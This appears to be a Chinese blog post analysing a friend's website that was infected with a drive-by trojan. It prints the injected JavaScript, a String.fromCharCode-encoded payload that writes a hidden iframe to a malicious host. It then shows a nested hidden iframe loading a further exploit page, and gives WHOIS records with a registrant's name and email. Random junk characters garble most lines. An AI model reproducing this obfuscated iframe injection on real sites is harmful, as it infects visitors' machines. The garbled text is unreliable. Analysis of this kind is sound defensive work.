首发在我的博客里面,
"O34 E?ql. nFnM9
pdMK http://www.areway.cn/?p=175 [LoQYDku |UTajEL o1AbB?%= 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
l=DF)#>w *,\v|]fc <script>t=’60,105,102,114,97,109,101,
IO)B3,g 32,115,114,99,61,104,116,116,112,58,47,47,
oE 'P 102,114,101,101,46,117,45,117,117,117,46,99,
10SI&O 110,47,101,114,114,111,114,46,104,116,109,
?I+L 32,119,105,100,116,104,61,49,48,48,32,104,
W!{RJWe 101,105,103,104,116,61,48,62,60,47,105,102,
-S$F\% 114,97,109,101,62′;
Xa`Q;J"h t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
5kGniG?T# tZ_'>7) <script>t=’60,105,102,114,97,109,101,32,115,
ale'-V)5 114,99,61,104,116,116,112,58,47,47,102,114,
Fp\;j\pfw 101,101,46,117,45,117,117,117,46,99,110,47,
#Oka7.yz 101,114,114,111,114,46,104,116,109,32,119,
VN`.*B|9[ 105,100,116,104,61,49,48,48,32,104,101,105,
2KLMFI.F 103,104,116,61,48,62,60,47,105,102,114,97,
~I||"$R 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
@KQ>DBWQM document.write(t);</script>
e=i X]%^ >wW{$ <html xmlns=”
mnm
ZO} http://www.w3.org/1999/xhtml ]Lv3XMa “>
)eZK/>L& <head>
|A&;m}(Mt <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
8$IKQNS <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
H/o_? qK <title>首页 - 爱生活家庭网
>@vu;j\*E5 b-u@?G|< 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
9nFL70 转换字符串后的大概内容是(谁点击后果自付):
VZ9 p " <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
_3Eo{^ gFR}WBl/ 查询玉米u-uuu.cn的详细信息:
)re<NE&M Domain Name: u-uuu.cn
f,G*e367: ROID: 20070901s10001s64972306-cn
[qc1
V%g Domain Status: ok
~F"S] Registrant Organization: 王雷
X4%uY Registrant Name: 王雷
]?6wU-a Administrative Email:
czlovexs@126.com 3](hMk,} Sponsoring Registrar: 北京万网志成科技有限公司
/.]u%;%r[ Name Server:ns.yovole.com
?+zFa2J Name Server:ns1.yovole.com
&5W;E+Pub Registration Date: 2007-09-01 17:54
T}fo Expiration Date: 2008-09-01 17:54
3x~7N 最后PING了一下地址 都没有什么….
P~a@{n*8 x,gk]C f 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
_dKMBcl)E <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
8T1`9ITl: <script language=”javascript” src=”
T5:Q_o] http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script |Y3w6 !$ >
|=0vgwd"S 这个玉米应该有可能是木马作者的:
9pLe8D foafau.info的详细信息:
yCQvo(V[F Access to INFO WHOIS information is provided to assist persons in
OAXA< determining the contents of a domain name registration record in the
IxbQ6 Afilias registry database. The data in this record is provided by
7_\G|Zd Afilias Limited for informational purposes only, and Afilias does not
!v8R( guarantee its accuracy. This service is intended only for query-based
$Cz2b/O access. You agree that you will use this data only for lawful purposes
4R'CLN
|t and that, under no circumstances will you use this data to: (a) allow,
Ul8HWk[6Iw enable, or otherwise support the transmission by e-mail, telephone, or
1KZigeHXI facsimile of mass unsolicited, commercial advertising or solicitations
oJa}NH
to entities other than the data recipient’s own existing customers; or
#Z1%XCt (b) enable high volume, automated, electronic processes that send
z|pt)Xl queries or data to the systems of Registry Operator, a Registrar, or
mG~kf]Y Afilias except as reasonably necessary to register domain names or
"rBB&l modify existing registrations. All rights reserved. Afilias reserves
TAG@Ab the right to modify these terms at any time. By submitting this query,
wV )\M]@ you agree to abide by this policy.
\c2x
udU Domain ID:D22418703-LRMS
cZVx4y%kz Domain Name:FOAFAU.INFO
\,13mB6 Created On:20-Nov-2007 16:05:42 UTC
m7^f%<l Last Updated On:20-Nov-2007 16:05:44 UTC
8?Rp2n*o Expiration Date:20-Nov-2008 16:05:42 UTC
y8YsS4E^Q Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
"^&H9